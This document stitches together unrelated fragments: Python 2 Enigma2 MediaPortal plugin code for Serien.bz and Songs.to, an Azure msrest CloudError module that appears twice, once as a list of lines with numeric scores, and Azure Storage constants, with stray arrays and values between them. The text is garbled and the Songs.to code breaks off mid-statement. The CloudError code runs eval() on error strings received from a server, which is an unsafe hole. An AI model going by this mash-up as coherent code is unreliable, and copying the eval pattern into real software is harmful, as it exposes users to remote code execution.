"\t\tif stream_url != None:\n", "\t\t\tself.session.open(SimplePlayer, [(self.serienName, stream_url, self.serienPic)], showPlaylist=False, ltype='serien.bz', cover=True)\n", "\n", "class sbzWatchlistScreen(MPScreen):\n", "\n", "\tdef __init__(self, session):\n", "\t\tself.plugin_path = mp_globals.pluginPath\n", "\t\tself.skin_path = mp_globals.pluginPath + mp_globals.skinsPath\n", "\t\tpath = \"%s/%s/defaultListScreen.xml\" % (self.skin_path, config.mediaportal.skin.value)\n", "\t\tif not fileExists(path):\n", "\t\t\tpath = self.skin_path + mp_globals.skinFallback + \"/defaultListScreen.xml\"\n", "\t\twith open(path, \"r\") as f:\n", "\t\t\tself.skin = f.read()\n", "\t\t\tf.close()\n", "\t\tMPScreen.__init__(self, session)\n", "\n", "\t\tself[\"actions\"] = ActionMap([\"MP_Actions\"], {\n", "\t\t\t\"0\" : self.closeAll,\n", "\t\t\t\"ok\" : self.keyOK,\n", "\t\t\t\"cancel\": self.keyCancel,\n", "\t\t\t\"up\" : self.keyUp,\n", "\t\t\t\"down\" : self.keyDown,\n", "\t\t\t\"right\" : self.keyRight,\n", "\t\t\t\"left\" : self.keyLeft,\n", "\t\t\t\"red\"\t: self.delWatchListEntry\n", "\t\t}, -1)\n", "\n", "\t\tself.keyLocked = True\n", "\t\tself['title'] = Label(\"Serien.bz\")\n", "\t\tself['ContentTitle'] = Label(\"Watchlist\")\n", "\t\tself['F1'] = Label(_(\"Delete\"))\n", "\n", "\t\tself.watchListe = []\n", "\t\tself.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)\n", "\t\tself['liste'] = self.ml\n", "\n", "\t\tself.onLayoutFinish.append(self.loadPage)\n", "\n", "\tdef loadPage(self):\n", "\t\tself.watchListe = []\n", "\t\tif fileExists(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\"):\n", "\t\t\tprint \"read watchlist\"\n", "\t\t\treadStations = open(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\",\"r\")\n", "\t\t\tfor rawData in readStations.readlines():\n", "\t\t\t\tdata = re.findall('\"(.*?)\" \"(.*?)\" \"(.*?)\" \"(.*?)\"', rawData, re.S)\n", "\t\t\t\tif data:\n", "\t\t\t\t\t(title, link, image, handlung) = data[0]\n", "\t\t\t\t\tprint title, link, image\n", "\t\t\t\t\tself.watchListe.append((title, link, image, handlung))\n", "\t\t\tprint \"Load Watchlist..\"\n", "\t\t\tself.watchListe.sort()\n", "\t\t\tself.ml.setList(map(self._defaultlistleft, self.watchListe))\n", "\t\t\treadStations.close()\n", "\t\t\tself.showInfos()\n", "\t\t\tself.keyLocked = False\n", "\n", "\tdef showInfos(self):\n", "\t\tif fileExists(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\"):\n", "\t\t\tprint \"read watchlist\"\n", "\t\t\treadStations = open(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\",\"r\")\n", "\t\t\tfor rawData in readStations.readlines():\n", "\t\t\t\tdata = re.findall('\"(.*?)\" \"(.*?)\" \"(.*?)\" \"(.*?)\"', rawData, re.S)\n", "\t\t\t\tif data:\n", "\t\t\t\t\tself.ImageUrl = self['liste'].getCurrent()[0][2]\n", "\t\t\t\t\tself.Handlung = self['liste'].getCurrent()[0][3]\n", "\t\t\t\t\tself['handlung'].setText(decodeHtml(self.Handlung))\n", "\t\t\t\t\tCoverHelper(self['coverArt']).getCover(self.ImageUrl)\n", "\t\telse:\n", "\t\t\tself['handlung'].setText(_(\"No information found.\"))\n", "\t\t\tpicPath = \"%s/skins/%s/images/no_coverArt.png\" % (self.plugin_path, config.mediaportal.skin.value)\n", "\t\t\tCoverHelper(self['coverArt']).getCover(picPath)\n", "\n", "\tdef delWatchListEntry(self):\n", "\t\texist = self['liste'].getCurrent()\n", "\t\tif self.keyLocked or exist == None:\n", "\t\t\treturn\n", "\n", "\t\tentryDeleted = False\n", "\t\tselectedName = self['liste'].getCurrent()[0][0]\n", "\n", "\t\twriteTmp = open(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist.tmp\",\"w\")\n", "\t\tif fileExists(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\"):\n", "\t\t\treadWatchlist = open(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\",\"r\")\n", "\t\t\tfor rawData in readWatchlist.readlines():\n", "\t\t\t\tdata = re.findall('\"(.*?)\" \"(.*?)\" \"(.*?)\" \"(.*?)\"', rawData, re.S)\n", "\t\t\t\tif data:\n", "\t\t\t\t\t(title, link, image, handlung) = data[0]\n", "\t\t\t\t\tif title != selectedName:\n", "\t\t\t\t\t\twriteTmp.write('\"%s\" \"%s\" \"%s\" \"%s\"\\n' % (title, link, image, handlung))\n", "\t\t\t\t\telse:\n", "\t\t\t\t\t\tif entryDeleted:\n", "\t\t\t\t\t\t\twriteTmp.write('\"%s\" \"%s\" \"%s\" \"%s\"\\n' % (title, link, image, handlung))\n", "\t\t\t\t\t\telse:\n", "\t\t\t\t\t\t\tentryDeleted = True\n", "\t\t\treadWatchlist.close()\n", "\t\t\twriteTmp.close()\n", "\t\t\tshutil.move(config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist.tmp\", config.mediaportal.watchlistpath.value+\"mp_sbz_watchlist\")\n", "\t\t\tself.loadPage()\n", "\n", "\tdef keyOK(self):\n", "\t\texist = self['liste'].getCurrent()\n", "\t\tif self.keyLocked or exist == None:\n", "\t\t\treturn\n", "\t\tserienName = self['liste'].getCurrent()[0][0]\n", "\t\tserienLink = self['liste'].getCurrent()[0][1]\n", "\t\tserienPic = self['liste'].getCurrent()[0][2]\n", "\t\tself.session.open(SerienEpListingScreen, serienLink, serienName, serienPic)" ]
[ 0, 0, 0, 0, 0.02857142857142857, 0, 0.03333333333333333, 0.023255813953488372, 0.015625, 0.022222222222222223, 0.037037037037037035, 0.012658227848101266, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0.02857142857142857, 0, 0.020833333333333332, 0.09090909090909091, 0.08333333333333333, 0.034482758620689655, 0.09090909090909091, 0.07692307692307693, 0.07142857142857142, 0.08, 0.1111111111111111, 0, 0.02702702702702703, 0.024390243902439025, 0, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.02, 0, 0.037037037037037035, 0.041666666666666664, 0.0425531914893617, 0.015384615384615385, 0.04, 0.05263157894736842, 0, 0.05555555555555555, 0.022222222222222223, 0.03333333333333333, 0.024390243902439025, 0.125, 0.024390243902439025, 0, 0.027777777777777776, 0, 0.03333333333333333, 0.023255813953488372, 0.015625, 0.022222222222222223, 0.037037037037037035, 0.012658227848101266, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0.02857142857142857, 0, 0.020833333333333332, 0.08333333333333333, 0.09090909090909091, 0.034482758620689655, 0.09090909090909091, 0.07692307692307693, 0.07142857142857142, 0.08, 0.1111111111111111, 0, 0.02702702702702703, 0.020833333333333332, 0.022727272727272728, 0.041666666666666664, 0.023809523809523808, 0.038461538461538464, 0, 0.022727272727272728, 0, 0.047619047619047616, 0.045454545454545456, 0.037037037037037035, 0.022727272727272728, 0, 0.03571428571428571, 0.012987012987012988, 0.1, 0.043478260869565216, 0.025, 0.015625, 0.015384615384615385, 0.038461538461538464, 0.05, 0, 0.045454545454545456, 0.023255813953488372, 0.03333333333333333, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0.020833333333333332, 0.020833333333333332, 0.015625, 0, 0.02, 0, 0.018518518518518517, 0.03225806451612903, 0.03225806451612903, 0.023255813953488372, 0.015625, 0.02247191011235955, 0.037037037037037035, 0.01282051282051282, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0.02857142857142857, 0.03333333333333333, 0, 0.020833333333333332, 0.08333333333333333, 0.07142857142857142, 0.09090909090909091, 0.034482758620689655, 0.09090909090909091, 0.07692307692307693, 0.07142857142857142, 0.07692307692307693, 0.06451612903225806, 0.1111111111111111, 0, 0.02702702702702703, 0.015873015873015872, 0.022727272727272728, 0.022727272727272728, 0, 0.041666666666666664, 0.023809523809523808, 0.038461538461538464, 0.0625, 0.047619047619047616, 0.022727272727272728, 0, 0.047619047619047616, 0.045454545454545456, 0.030303030303030304, 0.03571428571428571, 0.125, 0.04, 0.022727272727272728, 0, 0.03571428571428571, 0.014925373134328358, 0.1, 0.025, 0.015625, 0.015873015873015872, 0.038461538461538464, 0.04032258064516129, 0.05, 0, 0.045454545454545456, 0.02127659574468085, 0.02158273381294964, 0, 0.034482758620689655, 0.01834862385321101, 0.06666666666666667, 0.018518518518518517, 0.017543859649122806, 0.125, 0.045454545454545456, 0.02040816326530612, 0.014084507042253521, 0.018518518518518517, 0.02, 0.125, 0.02040816326530612, 0.015267175572519083, 0.029411764705882353, 0.045454545454545456, 0.016666666666666666, 0.1111111111111111, 0.017543859649122806, 0, 0.04, 0.047619047619047616, 0.1, 0, 0.018867924528301886, 0.018867924528301886, 0, 0.014084507042253521, 0, 0.0125, 0.03333333333333333, 0.02531645569620253, 0, 0.013157894736842105, 0.02127659574468085, 0.034482758620689655, 0.017391304347826087, 0.04, 0.014598540145985401, 0, 0.05555555555555555, 0.047619047619047616, 0.1, 0.020833333333333332, 0.020833333333333332, 0.03225806451612903, 0.024390243902439025, 0, 0.02564102564102564, 0, 0.015384615384615385, 0.03225806451612903, 0.03225806451612903, 0.034482758620689655, 0.023255813953488372, 0.015625, 0.02247191011235955, 0.037037037037037035, 0.01282051282051282, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0.02857142857142857, 0, 0.020833333333333332, 0.08333333333333333, 0.09090909090909091, 0.03571428571428571, 0.1111111111111111, 0, 0.02702702702702703, 0.01818181818181818, 0.025, 0, 0.041666666666666664, 0.023809523809523808, 0.038461538461538464, 0.022727272727272728, 0, 0.047619047619047616, 0.045454545454545456, 0.041666666666666664, 0.017543859649122806, 0.022727272727272728, 0, 0.03571428571428571, 0.013157894736842105, 0.05555555555555555, 0.05263157894736842, 0.012987012987012988, 0.0625, 0.05, 0.0297029702970297, 0.05555555555555555, 0.034482758620689655, 0.029411764705882353, 0.07692307692307693, 0.030303030303030304, 0, 0.034482758620689655, 0.029411764705882353, 0.07692307692307693, 0.030303030303030304, 0, 0.03225806451612903, 0, 0.02127659574468085, 0.015384615384615385, 0.03571428571428571, 0, 0.05555555555555555, 0.020833333333333332, 0.020833333333333332, 0.03225806451612903, 0.022988505747126436, 0, 0.023255813953488372, 0, 0.015384615384615385, 0.03225806451612903, 0.03225806451612903, 0.034482758620689655, 0.023255813953488372, 0.015625, 0.02247191011235955, 0.037037037037037035, 0.01282051282051282, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0.02857142857142857, 0, 0.020833333333333332, 0.08333333333333333, 0.09090909090909091, 0.03571428571428571, 0.1111111111111111, 0, 0.02702702702702703, 0.018518518518518517, 0.025, 0, 0.041666666666666664, 0.023809523809523808, 0.038461538461538464, 0.022727272727272728, 0, 0.047619047619047616, 0.045454545454545456, 0.017543859649122806, 0.046511627906976744, 0.023809523809523808, 0.02127659574468085, 0.03225806451612903, 0.014925373134328358, 0.015625, 0.04, 0, 0.05555555555555555, 0.020833333333333332, 0.022727272727272728, 0.015151515151515152, 0, 0.030303030303030304, 0.08, 0.014814814814814815, 0, 0.027777777777777776, 0, 0.03333333333333333, 0.023255813953488372, 0.015625, 0.02247191011235955, 0.037037037037037035, 0.01282051282051282, 0.034482758620689655, 0.041666666666666664, 0.07692307692307693, 0.02857142857142857, 0, 0.020833333333333332, 0.08333333333333333, 0.09090909090909091, 0.034482758620689655, 0.09090909090909091, 0.07692307692307693, 0.07142857142857142, 0.07692307692307693, 0.058823529411764705, 0.1111111111111111, 0, 0.041666666666666664, 0.02702702702702703, 0.022727272727272728, 0.029411764705882353, 0, 0.043478260869565216, 0.023809523809523808, 0.038461538461538464, 0, 0.022727272727272728, 0, 0.047619047619047616, 0.043478260869565216, 0.013157894736842105, 0.038461538461538464, 0.03488372093023256, 0.022727272727272728, 0.013888888888888888, 0.07692307692307693, 0.021739130434782608, 0.03333333333333333, 0.016666666666666666, 0.03571428571428571, 0.038461538461538464, 0.015625, 0.041666666666666664, 0.05, 0.038461538461538464, 0, 0.045454545454545456, 0.013157894736842105, 0.038461538461538464, 0.03488372093023256, 0.022727272727272728, 0.013888888888888888, 0.07692307692307693, 0.018518518518518517, 0.018518518518518517, 0.017543859649122806, 0.01694915254237288, 0.125, 0.017857142857142856, 0.0196078431372549, 0.0196078431372549, 0, 0.03333333333333333, 0.02702702702702703, 0.05263157894736842, 0.1, 0, 0.043478260869565216, 0.02, 0, 0.03529411764705882, 0.013157894736842105, 0.034482758620689655, 0.022222222222222223, 0.013888888888888888, 0.07692307692307693, 0.021739130434782608, 0.03225806451612903, 0.012658227848101266, 0.09090909090909091, 0.043478260869565216, 0.0125, 0.08333333333333333, 0.037037037037037035, 0.04, 0.05, 0.014598540145985401, 0.05263157894736842, 0, 0.05555555555555555, 0.02702702702702703, 0.05263157894736842, 0.1, 0.020833333333333332, 0.020833333333333332, 0.02127659574468085, 0.025974025974025976 ]
441
0.033868
false
# -------------------------------------------------------------------------- # # Copyright (c) Microsoft Corporation. All rights reserved. # # The MIT License (MIT) # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the ""Software""), to # deal in the Software without restriction, including without limitation the # rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. # # -------------------------------------------------------------------------- from requests import RequestException from msrest.exceptions import ClientException from msrest.serialization import Deserializer from msrest.exceptions import DeserializationError class CloudErrorData(object): """Cloud Error Data object, deserialized from error data returned during a failed REST API call. """ _validation = {} _attribute_map = { 'error': {'key': 'code', 'type': 'str'}, 'message': {'key': 'message', 'type': 'str'}, 'data': {'key': 'values', 'type': '{str}'} } def __init__(self, *args, **kwargs): self.error = None self._message = None self.request_id = None self.error_time = None self.data = None super(CloudErrorData, self).__init__(*args) def __str__(self): """Cloud error message.""" return str(self._message) @classmethod def _get_subtype_map(cls): return {} @property def message(self): """Cloud error message.""" return self._message @message.setter def message(self, value): """Attempt to deconstruct error message to retrieve further error data. """ try: value = eval(value) except (SyntaxError, TypeError): pass try: value = value.get('value', value) msg_data = value.split('\n') self._message = msg_data[0] except AttributeError: self._message = value return try: self.request_id = msg_data[1].partition(':')[2] time_str = msg_data[2].partition(':') self.error_time = Deserializer.deserialize_iso( "".join(time_str[2:])) except (IndexError, DeserializationError): pass class CloudError(ClientException): """ClientError, exception raised for failed Azure REST call. Will attempt to deserialize response into meaningful error data. :param requests.Response response: Response object. :param str error: Optional error message. """ def __init__(self, response, error=None, *args, **kwargs): self.deserializer = Deserializer() self.error = None self.message = None self.response = response self.status_code = self.response.status_code self.request_id = None if error: self.message = error self.error = response else: self._build_error_data(response) if not self.error or not self.message: self._build_error_message(response) super(CloudError, self).__init__( self.message, self.error, *args, **kwargs) def __str__(self): """Cloud error message""" return str(self.message) def _build_error_data(self, response): try: data = response.json() except ValueError: data = response else: data = data.get('error', data) try: self.error = self.deserializer(CloudErrorData(), data) except DeserializationError: self.error = None else: if self.error: if not self.error.error or not self.error.message: self.error = None else: self.message = self.error.message def _get_state(self, content): state = content.get("status") if not state: resource_content = content.get('properties', content) state = resource_content.get("provisioningState") return "Resource state {}".format(state) if state else "none" def _build_error_message(self, response): try: data = response.json() except ValueError: message = "none" else: message = data.get("message", self._get_state(data)) try: response.raise_for_status() except RequestException as err: if not self.error: self.error = err if not self.message: if message == "none": message = str(err) msg = "Operation failed with status: {!r}. Details: {}" self.message = msg.format(response.reason, message) else: if not self.error: self.error = response if not self.message: msg = "Operation failed with status: {!r}. Details: {}" self.message = msg.format( response.status_code, message)
[ "# --------------------------------------------------------------------------\n", "#\n", "# Copyright (c) Microsoft Corporation. All rights reserved.\n", "#\n", "# The MIT License (MIT)\n", "#\n", "# Permission is hereby granted, free of charge, to any person obtaining a copy\n", "# of this software and associated documentation files (the \"\"Software\"\"), to\n", "# deal in the Software without restriction, including without limitation the\n", "# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n", "# sell copies of the Software, and to permit persons to whom the Software is\n", "# furnished to do so, subject to the following conditions:\n", "#\n", "# The above copyright notice and this permission notice shall be included in\n", "# all copies or substantial portions of the Software.\n", "#\n", "# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n", "# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n", "# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n", "# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n", "# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n", "# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n", "# IN THE SOFTWARE.\n", "#\n", "# --------------------------------------------------------------------------\n", "\n", "from requests import RequestException\n", "\n", "from msrest.exceptions import ClientException\n", "from msrest.serialization import Deserializer\n", "from msrest.exceptions import DeserializationError\n", "\n", "\n", "class CloudErrorData(object):\n", " \"\"\"Cloud Error Data object, deserialized from error data returned\n", " during a failed REST API call.\n", " \"\"\"\n", "\n", " _validation = {}\n", " _attribute_map = {\n", " 'error': {'key': 'code', 'type': 'str'},\n", " 'message': {'key': 'message', 'type': 'str'},\n", " 'data': {'key': 'values', 'type': '{str}'}\n", " }\n", "\n", " def __init__(self, *args, **kwargs):\n", " self.error = None\n", " self._message = None\n", " self.request_id = None\n", " self.error_time = None\n", " self.data = None\n", " super(CloudErrorData, self).__init__(*args)\n", "\n", " def __str__(self):\n", " \"\"\"Cloud error message.\"\"\"\n", " return str(self._message)\n", "\n", " @classmethod\n", " def _get_subtype_map(cls):\n", " return {}\n", "\n", " @property\n", " def message(self):\n", " \"\"\"Cloud error message.\"\"\"\n", " return self._message\n", "\n", " @message.setter\n", " def message(self, value):\n", " \"\"\"Attempt to deconstruct error message to retrieve further\n", " error data.\n", " \"\"\"\n", " try:\n", " value = eval(value)\n", " except (SyntaxError, TypeError):\n", " pass\n", " try:\n", " value = value.get('value', value)\n", " msg_data = value.split('\\n')\n", " self._message = msg_data[0]\n", " except AttributeError:\n", " self._message = value\n", " return\n", " try:\n", " self.request_id = msg_data[1].partition(':')[2]\n", " time_str = msg_data[2].partition(':')\n", " self.error_time = Deserializer.deserialize_iso(\n", " \"\".join(time_str[2:]))\n", " except (IndexError, DeserializationError):\n", " pass\n", "\n", "\n", "class CloudError(ClientException):\n", " \"\"\"ClientError, exception raised for failed Azure REST call.\n", " Will attempt to deserialize response into meaningful error\n", " data.\n", "\n", " :param requests.Response response: Response object.\n", " :param str error: Optional error message.\n", " \"\"\"\n", "\n", " def __init__(self, response, error=None, *args, **kwargs):\n", " self.deserializer = Deserializer()\n", " self.error = None\n", " self.message = None\n", " self.response = response\n", " self.status_code = self.response.status_code\n", " self.request_id = None\n", "\n", " if error:\n", " self.message = error\n", " self.error = response\n", " else:\n", " self._build_error_data(response)\n", "\n", " if not self.error or not self.message:\n", " self._build_error_message(response)\n", " \n", " super(CloudError, self).__init__(\n", " self.message, self.error, *args, **kwargs)\n", "\n", " def __str__(self):\n", " \"\"\"Cloud error message\"\"\"\n", " return str(self.message)\n", "\n", " def _build_error_data(self, response):\n", " try:\n", " data = response.json()\n", " except ValueError:\n", " data = response\n", " else:\n", " data = data.get('error', data)\n", " try:\n", " self.error = self.deserializer(CloudErrorData(), data)\n", " except DeserializationError:\n", " self.error = None\n", " else:\n", " if self.error:\n", " if not self.error.error or not self.error.message:\n", " self.error = None\n", " else:\n", " self.message = self.error.message\n", "\n", " def _get_state(self, content):\n", " state = content.get(\"status\")\n", " if not state:\n", " resource_content = content.get('properties', content)\n", " state = resource_content.get(\"provisioningState\")\n", " return \"Resource state {}\".format(state) if state else \"none\"\n", "\n", " def _build_error_message(self, response):\n", " try:\n", " data = response.json()\n", " except ValueError:\n", " message = \"none\"\n", " else:\n", " message = data.get(\"message\", self._get_state(data))\n", " try:\n", " response.raise_for_status()\n", " except RequestException as err:\n", " if not self.error:\n", " self.error = err\n", " if not self.message:\n", " if message == \"none\":\n", " message = str(err)\n", " msg = \"Operation failed with status: {!r}. Details: {}\"\n", " self.message = msg.format(response.reason, message)\n", " else:\n", " if not self.error:\n", " self.error = response\n", " if not self.message:\n", " msg = \"Operation failed with status: {!r}. Details: {}\"\n", " self.message = msg.format(\n", " response.status_code, message)" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02 ]
173
0.003006
false
#------------------------------------------------------------------------- # Copyright (c) Microsoft. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. #-------------------------------------------------------------------------- import platform __author__ = 'Microsoft Corp. <ptvshelp@microsoft.com>' __version__ = '0.30.0' # x-ms-version for storage service. X_MS_VERSION = '2015-04-05' # UserAgent string sample: 'Azure-Storage/0.30.0 (Python CPython 3.4.2; Windows 8)' _USER_AGENT_STRING = 'Azure-Storage/{} (Python {} {}; {} {})'.format(__version__, platform.python_implementation(), platform.python_version(), platform.system(), platform.release()) # Live ServiceClient URLs SERVICE_HOST_BASE = 'core.windows.net' DEFAULT_PROTOCOL = 'https' # Development ServiceClient URLs DEV_BLOB_HOST = '127.0.0.1:10000' DEV_QUEUE_HOST = '127.0.0.1:10001' DEV_TABLE_HOST = '127.0.0.1:10002' # Default credentials for Development Storage Service DEV_ACCOUNT_NAME = 'devstoreaccount1' DEV_ACCOUNT_KEY = 'Eby8vdM02xNOcqFlqUwJPLlmEtlCDXJ1OUzFT50uSRZ6IFsuFq2UVErCz4I6tq/K1SZFPTOtr/KBHBeksoGMGw==' # Socket timeout in seconds is 5 min * 60 seconds _SOCKET_TIMEOUT = 5 * 60
[ "#-------------------------------------------------------------------------\n", "# Copyright (c) Microsoft. All rights reserved.\n", "#\n", "# Licensed under the Apache License, Version 2.0 (the \"License\");\n", "# you may not use this file except in compliance with the License.\n", "# You may obtain a copy of the License at\n", "# http://www.apache.org/licenses/LICENSE-2.0\n", "#\n", "# Unless required by applicable law or agreed to in writing, software\n", "# distributed under the License is distributed on an \"AS IS\" BASIS,\n", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n", "# See the License for the specific language governing permissions and\n", "# limitations under the License.\n", "#--------------------------------------------------------------------------\n", "import platform\n", "\n", "__author__ = 'Microsoft Corp. <ptvshelp@microsoft.com>'\n", "__version__ = '0.30.0'\n", "\n", "# x-ms-version for storage service.\n", "X_MS_VERSION = '2015-04-05'\n", "\n", "# UserAgent string sample: 'Azure-Storage/0.30.0 (Python CPython 3.4.2; Windows 8)'\n", "_USER_AGENT_STRING = 'Azure-Storage/{} (Python {} {}; {} {})'.format(__version__, platform.python_implementation(), platform.python_version(), platform.system(), platform.release())\n", "\n", "# Live ServiceClient URLs\n", "SERVICE_HOST_BASE = 'core.windows.net'\n", "DEFAULT_PROTOCOL = 'https'\n", "\n", "# Development ServiceClient URLs\n", "DEV_BLOB_HOST = '127.0.0.1:10000'\n", "DEV_QUEUE_HOST = '127.0.0.1:10001'\n", "DEV_TABLE_HOST = '127.0.0.1:10002'\n", "\n", "# Default credentials for Development Storage Service\n", "DEV_ACCOUNT_NAME = 'devstoreaccount1'\n", "DEV_ACCOUNT_KEY = 'Eby8vdM02xNOcqFlqUwJPLlmEtlCDXJ1OUzFT50uSRZ6IFsuFq2UVErCz4I6tq/K1SZFPTOtr/KBHBeksoGMGw=='\n", "\n", "# Socket timeout in seconds is 5 min * 60 seconds\n", "_SOCKET_TIMEOUT = 5 * 60" ]
[ 0.013333333333333334, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.013157894736842105, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0.005494505494505495, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.009174311926605505, 0, 0, 0.041666666666666664 ]
40
0.002368
false
# -*- coding: utf-8 -*- from Plugins.Extensions.MediaPortal.plugin import _ from Plugins.Extensions.MediaPortal.resources.imports import * from Plugins.Extensions.MediaPortal.resources.keyboardext import VirtualKeyBoardExt from Plugins.Extensions.MediaPortal.resources.songstolink import SongstoLink from Plugins.Extensions.MediaPortal.resources.simpleplayer import SimplePlayer, SimplePlaylist class showSongstoGenre(MPScreen): def __init__(self, session): self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel": self.keyCancel }, -1) self.baseurl = 'http://songs.to/json/songlist.php?' self["title"] = Label("Songs.to Music Player") self['ContentTitle'] = Label('Music Tops') self['name'] = Label(_("Selection:")) self.genreliste = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.keyLocked = False self.onLayoutFinish.append(self.layoutFinished) def layoutFinished(self): self.keyLocked = True url = "http://s.songs.to/js/data-en.js" getPage(url).addCallback(self.genreData).addErrback(self.dataError) def genreData(self, data): preparse = re.search('chart_types={(.*?)}', data, re.S).groups() if preparse: parse = re.findall("(music.*?):\\'(.*?)\\'", preparse[0], re.S) if parse: for (scUrl, scName) in parse: self.genreliste.append((scName, "charts="+scUrl)) self.genreliste.insert(0, ("Songs Top 500", "top=all")) self.genreliste.insert(0, ("Search Album", "&col=album")) self.genreliste.insert(0, ("Search Title", "&col=title")) self.genreliste.insert(0, ("Search Artist", "&col=artist")) self.ml.setList(map(self._defaultlistcenter, self.genreliste)) self.keyLocked = False def keyOK(self): if self.keyLocked: return scName = self['liste'].getCurrent()[0][0] scUrl = self['liste'].getCurrent()[0][1] if scName == "Songs Top 500": scUrl = self.baseurl + scUrl self.session.open(showSongstoAll, scUrl, scName) elif re.match('Search.*?', scName): self.suchtitel = scName self.suchmodus = scUrl self.session.openWithCallback(self.searchCallback, VirtualKeyBoardExt, title = (self.suchtitel), text = "", is_dialog=True) else: scUrl = self.baseurl + scUrl self.session.open(showSongstoTop, scUrl, scName) def searchCallback(self, callbackStr): if callbackStr is not None: self.suchString = callbackStr.replace(' ', '%20') scUrl = self.baseurl + "keyword=" + self.suchString + self.suchmodus scName = self.suchtitel + ": " + callbackStr self.session.open(showSongstoAll, scUrl, scName) class showSongstoAll(MPScreen): def __init__(self, session, link, name): self.scLink = link self.scGuiName = name self.plugin_path = mp_globals.pluginPath self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath path = "%s/%s/defaultGenreScreen.xml" % (self.skin_path, config.mediaportal.skin.value) if not fileExists(path): path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreen.xml" with open(path, "r") as f: self.skin = f.read() f.close() MPScreen.__init__(self, session) self["actions"] = ActionMap(["MP_Actions"], { "0" : self.closeAll, "ok" : self.keyOK, "cancel" : self.keyCancel }, -1) self["title"] = Label("Songs.to Music Player") self['ContentTitle'] = Label(self.scGuiName) self['name'] = Label(_("Selection:")) self.streamList = [] self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent) self['liste'] = self.ml self.keyLocked = False self.onLayoutFinish.append(self.layoutFinished) def layoutFinished(self): self.keyLocked = True if self.scGuiName != "Songs Top 500" and not re.match('Search.*?', self.scGuiName): self.scData(self.scLink) else: getPage(self.scLink, 